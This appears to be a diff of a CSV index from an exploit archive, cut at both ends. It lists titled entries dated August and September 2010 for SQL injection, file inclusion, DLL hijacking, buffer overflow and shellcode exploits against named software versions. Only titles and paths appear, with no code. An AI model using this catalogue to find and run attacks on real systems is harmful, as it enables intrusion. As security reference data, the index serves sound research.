Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 +14604,platforms/windows/remote/14604.py,"Easy FTP - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14606,platforms/multiple/webapps/14606.html,"Zendesk Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps,0 14607,platforms/windows/dos/14607.py,"Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos,0 14608,platforms/windows/dos/14608.txt,"Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048)",2010-08-10,"Core Security",windows,dos,0 @@ -12774,8 +12809,8 @@ id,file,description,date,author,platform,type,port 14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0 -14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0 +14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdisk,php,webapps,0 @@ -12787,6 +12822,8 @@ id,file,description,date,author,platform,type,port 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - ""Universal"" SEH Buffer Overflow Exploit",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow Exploit",2010-08-13,corelanc0d3r,windows,local,0 14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit",2010-08-13,LiquidWorm,windows,dos,0 +14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 +14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14636,platforms/php/webapps/14636.txt,"Plogger Remote File Disclosure Vulnerability",2010-08-13,Mr.tro0oqy,php,webapps,0 14637,platforms/php/webapps/14637.txt,"Get Tube All Versions SQL Injection Vulnerability",2010-08-13,Mr.P3rfekT,php,webapps,0 14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Include",2010-08-13,LoSt.HaCkEr,php,webapps,0 @@ -12799,16 +12836,15 @@ id,file,description,date,author,platform,type,port 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdisk,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0 14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 -14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0 +14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) SQL Injection Vulnerability",2010-08-16,Forza-Dz,php,webapps,0 14656,platforms/php/webapps/14656.txt,"Joomla Component Jgrid 1.0 - Local File Inclusion Vulnerability",2010-08-16,"Salvatore Fresta",php,webapps,0 -14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14659,platforms/php/webapps/14659.txt,"Joomla Component OnGallery SQL Injection Vulnerability",2010-08-16,"al bayraqim",php,webapps,0 +14666,platforms/windows/dos/14666.txt,"Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - (.m3u) Local Buffer Overflow Exploit",2010-08-16,"Glafkos Charalambous ",windows,local,0 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - (.pls) Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0 -14666,platforms/windows/dos/14666.txt,"Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14667,platforms/windows/dos/14667.txt,"Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0 14668,platforms/windows/dos/14668.txt,"Microsoft Windows Win32k!xxxRealDrawMenuItem() - Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos,0 14669,platforms/windows/dos/14669.txt,"Microsoft Windows Win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",windows,dos,0 @@ -12817,7 +12853,7 @@ id,file,description,date,author,platform,type,port 14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion Vulnerability",2010-08-17,Dr.$audi,php,webapps,0 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0 14674,platforms/windows/remote/14674.txt,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 -14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 +14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 14678,platforms/php/dos/14678.zip,"PHP 5.3.3 ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0 @@ -12825,12 +12861,12 @@ id,file,description,date,author,platform,type,port 14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure Vulnerability",2010-08-18,"Nikola Petrov",php,webapps,0 14685,platforms/windows/dos/14685.pl,"RockN Wav Editor 1.8 - Denial of Service Vulnerability",2010-08-18,d4rk-h4ck3r,windows,dos,0 14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,"mc2_s3lector ",php,webapps,0 -14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 14688,platforms/freebsd/local/14688.c,"FreeBSD mbufs() sendfile Cache Poisoning Privilege Escalation",2010-08-19,kingcope,freebsd,local,0 14689,platforms/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 14690,platforms/windows/dos/14690.pl,"Fennec 1.2 Beta 3 - Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 14691,platforms/lin_x86/shellcode/14691.c,"Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes",2010-08-19,Aodrulez,lin_x86,shellcode,0 14693,platforms/windows/local/14693.py,"Microsoft Word Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 +14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0 14694,platforms/php/webapps/14694.txt,"Joomla Component com_extcalendar Blind SQL Injection Vulnerability",2010-08-20,Lagripe-Dz,php,webapps,0 14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service Vulnerability",2010-08-20,PASSEWORD,windows,dos,0 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English MessageBoxA Shellcode - 87 bytes",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0 @@ -12841,7 +12877,6 @@ id,file,description,date,author,platform,type,port 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0 14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 -14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14712,platforms/php/webapps/14712.txt,"4images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 @@ -12854,36 +12889,37 @@ id,file,description,date,author,platform,type,port 14721,platforms/windows/local/14721.c,"Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)",2010-08-24,TheLeader,windows,local,0 14722,platforms/php/webapps/14722.txt,"Joomla 1.5 URL Redirecting Vulnerability",2010-08-24,Mr.MLL,php,webapps,0 14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)",2010-08-24,TheLeader,windows,local,0 -14726,platforms/windows/local/14726.c,"uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)",2010-08-24,TheLeader,windows,local,0 14727,platforms/hardware/local/14727.py,"Foxit Reader <= 4.0 pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 +14726,platforms/windows/local/14726.c,"uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)",2010-08-24,TheLeader,windows,local,0 14728,platforms/windows/local/14728.c,"Windows Live Email DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 +14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 (article.php) SQL Injection Vulnerability",2010-08-28,[]0iZy5,php,webapps,0 14730,platforms/windows/local/14730.c,"Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0 14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0 14734,platforms/windows/local/14734.c,"TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 +14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 +14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll)",2010-08-25,"Beenu Arora",windows,local,0 +14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll)",2010-08-25,"Beenu Arora",windows,local,0 +14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0 14739,platforms/windows/local/14739.c,"BS.Player <= 2.56 build 1043 DLL Hijacking Exploit (mfc71loc.dll)",2010-08-25,diwr,windows,local,0 14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)",2010-08-25,storm,windows,local,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 -14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 -14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll)",2010-08-25,"Beenu Arora",windows,local,0 -14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll)",2010-08-25,"Beenu Arora",windows,local,0 -14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 14748,platforms/windows/local/14748.txt,"uTorrent DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0 14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0 14751,platforms/windows/local/14751.txt,"Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0 +14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0 14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard DLL Hijacking Exploit (smmscrpt.dll)",2010-08-25,"Beenu Arora",windows,local,0 14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 DLL Hijacking Exploit (qtcf.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 -14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 +14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,anonymous,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Versions < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 -14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,anonymous,windows,local,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14766,platforms/windows/local/14766.c,"Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 @@ -12895,8 +12931,8 @@ id,file,description,date,author,platform,type,port 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 DLL Hijacking Exploit (wintab32.dll)",2010-08-25,CCNA,windows,local,0 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 -14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)",2010-08-25,storm,windows,local,0 14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal Vulnerability",2010-08-25,demonalex,windows,remote,0 +14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)",2010-08-25,storm,windows,local,0 14780,platforms/windows/local/14780.c,"Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll)",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)",2010-08-25,storm,windows,local,0 @@ -12909,20 +12945,20 @@ id,file,description,date,author,platform,type,port 14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0 14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0 14791,platforms/windows/local/14791.c,"Daemon tools lite DLL Hijacking Exploit (mfc80loc.dll)",2010-08-25,"Mohamed Clay",windows,local,0 +14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 dll Hijacking Exploit (color.dll)",2010-08-25,"xsploited security",windows,local,0 +14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14795,platforms/bsd/shellcode/14795.c,"bds/x86-bindshell on port 2525 shellcode - 167 bytes",2010-08-25,beosroot,bsd,shellcode,0 +14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection Vulnerability",2010-08-26,"Lord Tittis3000",php,webapps,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant Remote File Inclusion Vulnerability",2010-08-26,LoSt.HaCkEr,php,webapps,0 14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 -14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection Vulnerability",2010-08-26,"Lord Tittis3000",php,webapps,0 +14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 - Remote File Include Exploit",2010-08-26,bd0rk,php,webapps,0 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 -14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0 14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0 -14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 -14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injection Vulnerabilities",2010-08-27,Sweet,php,webapps,0 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection Vulnerability",2010-08-27,Pouya_Server,asp,webapps,0 @@ -12931,7 +12967,6 @@ id,file,description,date,author,platform,type,port 14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow Vulnerability",2010-08-28,LiquidWorm,windows,dos,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection Vulnerability",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - (profile.php) SQL Injection Exploit",2010-08-28,"Ptrace Security",php,webapps,0 -14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 (article.php) SQL Injection Vulnerability",2010-08-28,[]0iZy5,php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure Vulnerability",2010-08-28,Dr.$audi,php,webapps,0 14830,platforms/linux/local/14830.py,"nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow Vulnerability (SEH)",2010-08-29,"James Fitts",windows,local,0 @@ -12947,30 +12982,29 @@ id,file,description,date,author,platform,type,port 14843,platforms/windows/dos/14843.txt,"Apple QuickTime ""_Marshaled_pUnk"" Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure Vulnerability",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0 -14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard SQL Injection Vulnerability",2010-08-31,Ariko-Security,php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 +14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 14852,platforms/windows/dos/14852.txt,"leadtools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - ""newclass"" invalid pointer",2010-09-01,Abysssec,windows,remote,0 -14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0 +14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability",2010-09-01,d3b4g,windows,dos,0 14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability",2010-09-01,"BorN To K!LL",php,webapps,0 +14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 14867,platforms/php/webapps/14867.txt,"vbShout 5.2.2 - Remote/Local File Inclusion Vulnerability",2010-09-02,fred777,php,webapps,0 -14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 -14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 -14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 +14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com / Dell_ SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 +14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 -14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0 @@ -12984,44 +13018,45 @@ id,file,description,date,author,platform,type,port 14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0 -14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(""/bin/sh"", [0], [0 vars]) - 27 bytes",2010-09-05,"Jonathan Salwan",arm,shellcode,0 +14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 +14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(""/bin/sh""_ [0]_ [0 vars]) (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager 